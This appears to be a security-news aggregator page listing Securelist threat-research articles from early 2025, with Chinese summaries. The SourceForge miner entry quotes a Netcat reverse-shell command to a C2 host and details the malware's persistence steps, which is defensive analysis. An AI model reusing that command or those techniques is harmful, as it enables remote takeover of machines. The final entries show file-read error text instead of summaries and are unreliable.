Threat landscape for industrial automation systems in Q1 2025 ICS计算机上恶意对象被阻止的百分比保持稳定在21.9%，但逐年下降。生物识别行业比例上升。地区差异显著（北欧10.7%，非洲29.6%）。互联网和邮件为主要威胁源。挖矿软件比例增加。... 2025-5-15 13:7:40 | 阅读: 16 | 收藏 | Securelist - securelist.com malicious q1 threats pp miners

Using a Mythic agent to optimize penetration testing 本文探讨了网络安全公司如何利用Mythic框架进行渗透测试。通过分析现有工具的缺陷（如Cobalt Strike和Metasploit易被检测），选择了支持模块化设计和多种通信方式的Mythic框架。详细介绍了Stage 1模块的设计与实现方法，包括COFF文件执行、内存加载机制及与Mythic框架的通信模型。... 2025-5-13 10:0:41 | 阅读: 9 | 收藏 | Securelist - securelist.com payload stage security memory mythic

State of ransomware in 2025 2024年勒索软件检测量下降18%，但针对组织的攻击比例上升至41.6%。RaaS模式主导攻击市场，赎金总额下降35%，但平均赎金上涨至396万美元。数据外泄与双重勒索策略普及。中东、亚太地区受创较重。未来威胁或利用AI与非常规漏洞加剧风险。... 2025-5-7 10:0:39 | 阅读: 20 | 收藏 | Securelist - securelist.com ransomware ransomhub attackers security

Outlaw cybergang attacking targets worldwide 这篇文章分析了Linux环境中的挖矿僵尸网络Outlaw（又称Dota），其通过弱或默认SSH凭证传播，在受感染系统中部署加密货币矿工和IRC botnet。该恶意软件会清除现有SSH设置并添加新密钥以维持持久性，并通过隐藏文件和目录、混淆程序等手段规避检测。受害者主要分布在北美和欧洲等地。建议加强SSH配置以防范此类威胁。... 2025-4-29 10:0:29 | 阅读: 23 | 收藏 | Securelist - securelist.com ssh outlaw attackers perl

Triada strikes back 新版本Triada木马通过感染安卓设备固件，在系统分区植入恶意软件，使其难以移除。木马利用多阶段加载器感染Zygote进程，影响所有应用，可窃取加密货币钱包地址、替换浏览器链接、发送短信及窃取登录凭证。... 2025-4-25 10:0:14 | 阅读: 15 | 收藏 | Securelist - securelist.com malicious triada c2 attackers trojan

Operation SyncHole: Lazarus APT goes back to the well Lazarus组织通过“Operation SyncHole”活动利用 watering hole 战略和韩国软件漏洞攻击了至少六家韩国组织，包括软件、IT、金融、半导体制造和电信行业。该活动结合了多种恶意工具和漏洞利用，并已确认相关软件已更新至补丁版本以修复漏洞。... 2025-4-24 05:0:4 | 阅读: 26 | 收藏 | Securelist - securelist.com software c2 signbt korea

Russian organizations targeted by backdoor masquerading as secure networking software updates 文章描述了一起针对俄罗斯政府、金融和工业部门的复杂网络攻击事件。攻击者通过伪装ViPNet软件更新分发恶意软件，利用路径替换技术执行恶意程序并植入后门。该后门可连接C2服务器，用于窃取文件和执行其他恶意操作。文章强调了多层防御的重要性，并提供了相关威胁指标。... 2025-4-22 13:0:8 | 阅读: 14 | 收藏 | Securelist - securelist.com msinfo32 vipnet security lumpdiag malicious

Lumma Stealer – Tracking distribution channels Lumma Stealer是一种通过虚假CAPTCHA页面传播的信息窃取恶意软件，利用钓鱼网站、克隆站点和Telegram渠道诱导用户执行恶意命令。它采用DLL侧载和注入合法软件覆盖区等技术规避检测，并窃取加密货币钱包、2FA数据及浏览器凭证等敏感信息。... 2025-4-21 12:0:51 | 阅读: 15 | 收藏 | Securelist - securelist.com payload lumma stealer malicious captcha

Phishing attacks leveraging HTML code inside SVG files 近年来，网络钓鱼攻击采用更复杂的手段欺骗用户并绕过安全措施。攻击者利用SVG格式文件嵌入HTML和JavaScript代码，隐藏恶意链接或重定向脚本。这种技术使钓鱼邮件更具隐蔽性，并导致用户被引导至伪造的登录页面以窃取凭证。2025年数据显示此类攻击呈上升趋势。... 2025-4-21 08:0:49 | 阅读: 21 | 收藏 | Securelist - securelist.com phishing attachment attackers graphics markup

IronHusky updates the forgotten MysterySnail RAT to target Russia and Mongolia 研究人员发现MysterySnail RAT恶意软件的新版本在蒙古和俄罗斯政府机构中被使用。该恶意软件通过伪装成文档的恶意MMC脚本传播，并利用DLL侧加载技术加载恶意库。新版本采用模块化架构，增加了更多功能模块，并支持通过WebSocket协议通信的轻量级变种MysteryMonoSnail。该恶意软件自2021年以来持续活跃，提醒安全团队需警惕旧威胁的重现。... 2025-4-17 08:15:16 | 阅读: 18 | 收藏 | Over Security - Cybersecurity news aggregator - securelist.com malicious processes c2 attackers

Streamlining detection engineering in security operation centers 文章探讨了安全运营中心（SOC）在网络安全中的作用，重点分析了SIEM系统在日志收集、威胁检测、分类与调查及响应四个阶段中的常见问题与挑战，并提出了通过建立专门的检测工程团队、优化流程与工具以及实施最佳实践来提升威胁检测能力的有效方法。... 2025-4-16 10:0:15 | 阅读: 11 | 收藏 | Securelist - securelist.com security threats detections metric triage

GOFFEE continues to attack organizations in Russia 文章描述了威胁行为者GOFFEE针对俄罗斯实体的网络攻击活动，利用鱼叉式网络钓鱼邮件和恶意附件进行初始感染。攻击中使用了多种恶意软件工具，包括PowerTaskel、PowerModul和USB Worm，并通过WinRM服务进行横向移动。GOFFEE在2024年引入了新的植入工具PowerModul，并逐渐转向使用二进制Mythic代理进行内部传播。... 2025-4-10 10:0:12 | 阅读: 16 | 收藏 | Securelist - securelist.com powershell powertaskel powermodul mythic malicious

Attackers distributing a miner and the ClipBanker Trojan via SourceForge 攻击者利用SourceForge平台分发恶意软件，在看似合法的项目页面中嵌入恶意链接和下载按钮。用户点击后会被重定向至伪装页面下载伪装成Office工具的恶意压缩包vinstaller.zip。该压缩包内含加密文件installer.zip及密码提示文档Readme.txt。解压后运行installer.msi会执行嵌入式VB脚本并下载批处理脚本confvk从GitHub获取RAR密码解压恶意档案。 解压后的档案包含AutoIt解释器Input.exe及两个动态链接库Icon.dll和Kape.dll（均含压缩AutoIt脚本），以及Netcat网络工具ShellExperienceHost.exe及其依赖项libssl-1_1.dll、libcrypto-1_1.dll、vcruntime140.dll。 confvk批处理脚本执行以下操作： 1. 检测系统中是否已存在感染迹象（如AutoIt解释器路径）； 2. 检查是否存在安全软件、虚拟环境或研究工具进程； 3. 若未检测到威胁，则继续执行； 4. 解压RAR档案并运行两个PowerShell脚本： - 第一个PowerShell脚本通过Telegram API发送感染设备信息； - 第二个PowerShell脚本下载并执行另一个批处理脚本confvz。 confvz批处理脚本进一步完成以下步骤： 1. 在%ProgramData%目录下创建三个子目录，并将解压出的文件分别移动至相应目录； 2. 在%USERPROFILE%\Cookies目录下创建ini.cmd和init.cmd批处理脚本； 3. 在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths下创建键值以关联这些批处理脚本； 4. 创建三个服务NetworkConfiguration、PerformanceMonitor和Update以实现自启动功能； 5. 作为备用启动方法，在注册表中添加键值以在MicrosoftEdgeUpdate.exe启动时触发cmd.exe执行start.exe； 6. 使用WMIC创建事件过滤器以每80秒触发一次handler命令：ShellExperienceHost.exe --ssl apap.app 445 -e cmd.exe（即通过Netcat建立与C2服务器apap.app:445的加密连接并启动cmd.exe）； 7. 创建ErrorHandler.cmd文件，并通过WMIC设置每300秒触发一次cmd.exe执行Setup.exe（该Setup.exe实际指向%WINDIR%\System32\oobe\Setup.exe），从而间接执行ErrorHandler.cmd中的PowerShell脚本以通过Telegram API获取并执行远程指令。 最终目标是运行两个AutoIt脚本： - Icon.dll重新启动AutoIt解释器并注入矿工软件； - Kape.dll同样重启AutoIt解释器但注入ClipBanker恶意软件（用于劫持剪贴板中的加密货币钱包地址）。 受害者统计显示90%潜在受害者位于俄罗斯地区（共4,604名用户在2023年1月至3月期间遭遇此攻击）。... 2025-4-8 10:0:25 | 阅读: 13 | 收藏 | Securelist - securelist.com sourceforge software autoit attackers

How ToddyCat tried to hide behind AV software ToddyCat APT组织利用恶意工具TCESB通过DLL代理技术绕过安全防护，在ESET扫描器中利用CVE-2024-11859漏洞加载恶意DLL，并使用BYOVD技术安装易受攻击的驱动程序以提升权限。... 2025-4-7 10:0:44 | 阅读: 13 | 收藏 | Securelist - securelist.com tcesb malicious payload eset library

A journey into forgotten Null Session and MS-RPC interfaces, part 2 文章探讨了Windows中无认证枚举域信息的问题及其原因，并通过逆向工程分析MS-RPC安全机制和WMI的工作原理。研究揭示组策略限制无认证访问的局限性，并提供检测方法如使用RPC-Firewall工具。... 2025-4-4 10:0:38 | 阅读: 9 | 收藏 | Securelist - securelist.com security client remote nrpc

TookPS: DeepSeek isn’t the only game in town 文章揭示了一起利用DeepSeek LLM作为诱饵的大规模网络攻击活动。攻击者分发伪装成流行软件的恶意程序TookPS，在受害者设备上建立SSH隧道并植入后门程序以获取完全控制权。建议用户避免从不可信来源下载软件，并加强安全意识培训。... 2025-4-2 10:0:5 | 阅读: 12 | 收藏 | Securelist - securelist.com software malicious powershell attackers c2

Operation ForumTroll: APT attack with Google Chrome zero-day exploit chain read file error: read notes: is a directory... 2025-3-25 21:30:22 | 阅读: 46 | 收藏 | Securelist - securelist.com chrome malicious attackers trojan dubbed

Financial cyberthreats in 2024 read file error: read notes: is a directory... 2025-3-25 08:0:33 | 阅读: 49 | 收藏 | Securelist - securelist.com phishing trojan banker security download

Threat landscape for industrial automation systems in Q4 2024 read file error: read notes: is a directory... 2025-3-21 10:0:29 | 阅读: 19 | 收藏 | Securelist - securelist.com malicious pp q4 decreased quarter

Arcane stealer: We want all your data read file error: read notes: is a directory... 2025-3-19 10:15:18 | 阅读: 18 | 收藏 | Over Security - Cybersecurity news aggregator - securelist.com arcane stealer cheats loader